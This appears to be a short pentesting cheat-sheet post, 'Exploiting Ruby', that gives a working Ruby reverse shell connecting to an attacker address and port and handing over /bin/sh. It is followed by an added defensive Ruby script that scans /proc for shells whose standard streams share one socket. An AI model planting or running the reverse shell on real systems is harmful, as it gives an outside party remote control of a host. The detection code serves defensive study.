Exploiting Ruby

author: Nathan Acks
date: 2022-07-11

A simple reverse shell:

require "socket"

attacker_ip = "10.0.0.1"
attacker_port = 1234

f = TCPSocket.open(attacker_ip, attacker_port).to_i

exec sprintf("/bin/sh -i <&%d >&%d 2>&%d", f, f, f)

Catch it with netcat or socat.
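
Seen from the host where the snippet runs, the resulting `/bin/sh -i` has stdin, stdout and stderr all attached to the same TCP socket. The following is an added example, not part of the original notes, that scans a Linux `/proc`-style tree for shells in that state; the function names, the shell list and the sample tree are assumptions made for illustration.

```ruby
require "tmpdir"
require "fileutils"

SHELLS = %w[sh bash dash zsh ksh].freeze # assumed list of shell names to check

# Process name from <proc_root>/<pid>/comm, or nil if it is gone or unreadable.
def read_comm(proc_root, pid)
  File.read(File.join(proc_root, pid, "comm")).strip
rescue SystemCallError
  nil
end

# Socket inode if fds 0, 1 and 2 all point at the same socket, otherwise nil.
def stdio_socket(proc_root, pid)
  targets = (0..2).map { |fd| File.readlink(File.join(proc_root, pid, "fd", fd.to_s)) }
  return nil unless targets.uniq.size == 1
  targets.first[/\Asocket:\[(\d+)\]\z/, 1]
rescue SystemCallError
  nil
end

# Scan a /proc-style tree for shells whose whole stdio is one socket.
def find_socket_shells(proc_root = "/proc")
  hits = Dir.children(proc_root).grep(/\A\d+\z/).filter_map do |pid|
    comm = read_comm(proc_root, pid)
    next unless SHELLS.include?(comm)
    inode = stdio_socket(proc_root, pid)
    { pid: pid.to_i, comm: comm, socket_inode: inode.to_i } if inode
  end
  hits.sort_by { |h| h[:pid] }
end

# Constructed sample: a fake /proc tree (pids, names and inodes are made up).
def build_sample_proc(root)
  procs = {
    "100" => ["bash", %w(/dev/pts/0 /dev/pts/0 /dev/pts/0)],          # terminal shell
    "200" => ["sh",   %w(socket:[4242] socket:[4242] socket:[4242])], # stdio on one socket
    "300" => ["ruby", %w(socket:[5151] socket:[5151] socket:[5151])], # not a shell
    "400" => ["sh",   %w(pipe:[77] socket:[88] socket:[88])]          # mixed stdio
  }
  procs.each do |pid, (comm, fds)|
    FileUtils.mkdir_p(File.join(root, pid, "fd"))
    File.write(File.join(root, pid, "comm"), "#{comm}\n")
    fds.each_with_index { |t, fd| File.symlink(t, File.join(root, pid, "fd", fd.to_s)) }
  end
end

# Run the scan over the constructed tree and return the findings.
def demo
  Dir.mktmpdir { |dir| build_sample_proc(dir); find_socket_shells(dir) }
end

p demo if __FILE__ == $PROGRAM_NAME
```

This is a heuristic: a service that legitimately hands an accepted socket to a shell matches as well, so treat a hit as a lead to triage. On a live host, call `find_socket_shells` with no argument and sufficient privileges to read other users' `/proc/<pid>/fd`.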